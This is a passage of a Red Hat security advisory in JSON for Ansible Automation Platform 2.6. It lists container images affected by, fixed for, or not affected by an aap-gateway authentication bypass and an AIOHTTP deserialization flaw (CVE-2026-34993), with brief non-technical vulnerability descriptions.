"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "aap-gateway: aap-gateway: Authentication bypass in Event-Driven Ansible via forged HTTP header"
},
{
"cve": "CVE-2026-34993",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2026-06-02T20:01:12.690409+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484099"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in AIOHTTP, an asynchronous HTTP client/server framework for asyncio and Python. An attacker could exploit this vulnerability by providing untrusted input to the `CookieJar.load()` function. This could potentially lead to arbitrary code execution, allowing the attacker to run malicious code on the affected system. This issue is most likely to occur in applications that allow attacker-controlled files to be loaded.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aiohttp: AIOHTTP: Arbitrary code execution via untrusted input to CookieJar.load()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw in AIOHTTP, a Python asynchronous HTTP framework, due to potential arbitrary code execution. The vulnerability arises when applications load untrusted input into the `CookieJar.load()` function. Exploitation requires an application to be configured to process attacker-controlled files, which is not a default or common scenario in most Red Hat product deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
